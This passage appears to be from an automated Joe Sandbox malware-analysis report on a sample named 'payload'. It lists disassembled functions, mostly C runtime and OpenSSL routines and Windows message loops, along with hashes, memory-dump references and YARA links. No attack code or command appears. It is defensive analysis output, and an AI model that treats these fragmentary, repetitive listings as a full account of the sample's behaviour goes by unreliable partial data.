                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                                        • API String ID: 909875538-2908105608
                                                                                                                                                                        • Opcode ID: 54c18a91abdadd4a7c6db9573608789c22d84eb41ee4c78bf919df2afadb4121
                                                                                                                                                                        • Instruction ID: 6200d33377725844d5fda074f14ce1014b9a22fbbfc5db450572befaf3599d7d
                                                                                                                                                                        • Opcode Fuzzy Hash: 54c18a91abdadd4a7c6db9573608789c22d84eb41ee4c78bf919df2afadb4121
                                                                                                                                                                        • Instruction Fuzzy Hash: 93412AA5B8835529FB32652DBC03FA667C58B50F11F0C48B1FB88EB2C2F791854E8195
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB5141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __init_pointers.LIBCMT ref: 00BB5141
                                                                                                                                                                          • Part of subcall function 00BB7D6C: EncodePointer.KERNEL32(00000000,?,00BB5146,00BB3FFE,00C97990,00000014), ref: 00BB7D6F
                                                                                                                                                                          • Part of subcall function 00BB7D6C: __initp_misc_winsig.LIBCMT ref: 00BB7D8A
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00BC26B3
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BC26C7
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BC26DA
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BC26ED
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BC2700
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00BC2713
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00BC2726
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00BC2739
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00BC274C
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00BC275F
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00BC2772
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00BC2785
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00BC2798
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00BC27AB
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00BC27BE
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00BC27D1
                                                                                                                                                                        • __mtinitlocks.LIBCMT ref: 00BB5146
                                                                                                                                                                        • __mtterm.LIBCMT ref: 00BB514F
                                                                                                                                                                          • Part of subcall function 00BB51B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00BB5154,00BB3FFE,00C97990,00000014), ref: 00BB8B62
                                                                                                                                                                          • Part of subcall function 00BB51B7: _free.LIBCMT ref: 00BB8B69
                                                                                                                                                                          • Part of subcall function 00BB51B7: DeleteCriticalSection.KERNEL32(00C9AC00,?,?,00BB5154,00BB3FFE,00C97990,00000014), ref: 00BB8B8B
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00BB5174
                                                                                                                                                                        • __initptd.LIBCMT ref: 00BB5196
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BB519D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3567560977-0
                                                                                                                                                                        • Opcode ID: d587970450754fa2ccb19b1ffee2645b2d7a41badc03ebc22af0d24e0cca9a34
                                                                                                                                                                        • Instruction ID: e7db26d6b91c73aa4ec8b7bcdf1d3132eccb0b12d980bfa91ab4ef222d73726a
                                                                                                                                                                        • Opcode Fuzzy Hash: d587970450754fa2ccb19b1ffee2645b2d7a41badc03ebc22af0d24e0cca9a34
                                                                                                                                                                        • Instruction Fuzzy Hash: 0BF09036159B511FE63977B8BC07BFE2AD4EF01730B2106EAF064E51D1EFE0944185A6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB53AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB594A
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __mtinitlocknum.LIBCMT ref: 00BB8B09
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __amsg_exit.LIBCMT ref: 00BB8B15
                                                                                                                                                                          • Part of subcall function 00BB8AF7: EnterCriticalSection.KERNEL32(00000000,?,00BB50D7,0000000D), ref: 00BB8B22
                                                                                                                                                                        • _free.LIBCMT ref: 00BB5970
                                                                                                                                                                          • Part of subcall function 00BB0BED: RtlFreeHeap.NTDLL(00000000,00000000,?,00BB507F,00000000,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0C01
                                                                                                                                                                          • Part of subcall function 00BB0BED: GetLastError.KERNEL32(00000000,?,00BB507F,00000000,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0C13
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB5989
                                                                                                                                                                        • ___removelocaleref.LIBCMT ref: 00BB5998
                                                                                                                                                                        • ___freetlocinfo.LIBCMT ref: 00BB59B1
                                                                                                                                                                        • _free.LIBCMT ref: 00BB59C4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 626533743-0
                                                                                                                                                                        • Opcode ID: 6c150211f6204f7c0fc0f53a2c031299ff146f784f227d157f728f6d387ab5ac
                                                                                                                                                                        • Instruction ID: 45d4009dfcc91457d41ad81ed266767d2fe3491bc03d72771fe5fe2afc3e7fd3
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c150211f6204f7c0fc0f53a2c031299ff146f784f227d157f728f6d387ab5ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 18015731502B00EBDE34AB68A846BFD72E4AF10731F2046DAE0A59A0D5CFF49981DA56
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE06A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 00BE07C3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                                                        • API String ID: 601868998-2416195885
                                                                                                                                                                        • Opcode ID: ca43da1518594e528d256e66c02f702340bf0a729c5a2729890b6e33c96806f3
                                                                                                                                                                        • Instruction ID: cb0d62b3a9f0f35387b5fdb6cd869697745f44e087101bfd881969e2d1a1ee9a
                                                                                                                                                                        • Opcode Fuzzy Hash: ca43da1518594e528d256e66c02f702340bf0a729c5a2729890b6e33c96806f3
                                                                                                                                                                        • Instruction Fuzzy Hash: AE41C471A043459BD720EE55CC45BAFB3D8EF95348F0008AEF585D3141E7B5ED098BA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD16EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00BD1726
                                                                                                                                                                        • _strlen.LIBCMT ref: 00BD1734
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        • _strnlen.LIBCMT ref: 00BD17BF
                                                                                                                                                                        • __lock.LIBCMT ref: 00BD17D0
                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00BD17DB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2168648987-0
                                                                                                                                                                        • Opcode ID: fc4668ddae5c6d1a372a61f7b6b76930fc56d3e69f60417da3e55d1a0e2df11d
                                                                                                                                                                        • Instruction ID: 96f21b28af747124c3454cde1262dd79e9543e5e195f5fd3320da5485e7d127b
                                                                                                                                                                        • Opcode Fuzzy Hash: fc4668ddae5c6d1a372a61f7b6b76930fc56d3e69f60417da3e55d1a0e2df11d
                                                                                                                                                                        • Instruction Fuzzy Hash: 11319A71655215BBDB216B6CDC41BEEB6D89F05B20F1409D6F814EB392FFB4CD0086A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BCB6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BCB70B
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00E50000,00000000,00000001,00000001,?,?,?,00BC0E81,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0CA5
                                                                                                                                                                        • _free.LIBCMT ref: 00BCB71E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1020059152-0
                                                                                                                                                                        • Opcode ID: f51247a2c8edf308c852c0373dc226d12569051d9f8dc410f9e72db864f6fa60
                                                                                                                                                                        • Instruction ID: b17f683c7907748ec1883d9ef00c4bae99b5dd4fed2150e25f9aacdad41a164b
                                                                                                                                                                        • Opcode Fuzzy Hash: f51247a2c8edf308c852c0373dc226d12569051d9f8dc410f9e72db864f6fa60
                                                                                                                                                                        • Instruction Fuzzy Hash: 14119132505715AFCB312FB4AC86FBE3AD8EF85361F1045AAFC59A6151DF708C409691
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAF070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00BAF085
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAF0AC
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAF0B6
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAF0C4
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00BAF0D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: fe2a593a4bd5e747066365b2ae262c78cba085728071784bb57315478cfb8323
                                                                                                                                                                        • Instruction ID: ed4abd93faa147ce185e07782f26213d2e2d0e4986e27c7fe4513cc18a2097b5
                                                                                                                                                                        • Opcode Fuzzy Hash: fe2a593a4bd5e747066365b2ae262c78cba085728071784bb57315478cfb8323
                                                                                                                                                                        • Instruction Fuzzy Hash: 730184356403096AEA309B54DC86FEE77A8E745B04F504051FA00AB1E3D7B5A545CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAE500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00BAE515
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAE53C
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAE546
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAE554
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00BAE562
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 48720bd9f44441faab8d6f632bf6e615ebe20a020ef8b2048ec5016b95ad5939
                                                                                                                                                                        • Instruction ID: 1b637ffbefb5684ff91a2a0cf8276ed58ee2161d04d566b0bd8a76cd77afc020
                                                                                                                                                                        • Opcode Fuzzy Hash: 48720bd9f44441faab8d6f632bf6e615ebe20a020ef8b2048ec5016b95ad5939
                                                                                                                                                                        • Instruction Fuzzy Hash: 4301DB35B803497AEB209B54EC87FAE7BACE745B08F144051FA00BB1E2D6F9A545C7B4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAFA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00BAFA53
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAFA71
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAFA7B
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAFA89
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00BAFA94
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 532fd262fd5af032d09f51c6669e7221e37bb2aeeb1784e06d8804849ea8be3b
                                                                                                                                                                        • Instruction ID: 202497c6d3a827972449d65d04f7797bd25dfcb68585105b00cfd013fc463e45
                                                                                                                                                                        • Opcode Fuzzy Hash: 532fd262fd5af032d09f51c6669e7221e37bb2aeeb1784e06d8804849ea8be3b
                                                                                                                                                                        • Instruction Fuzzy Hash: 62018631B40309BBEB209B94DC8AFFA3BACEB45B41F544061FA04FE1D1D7F5A84586A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE73F0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
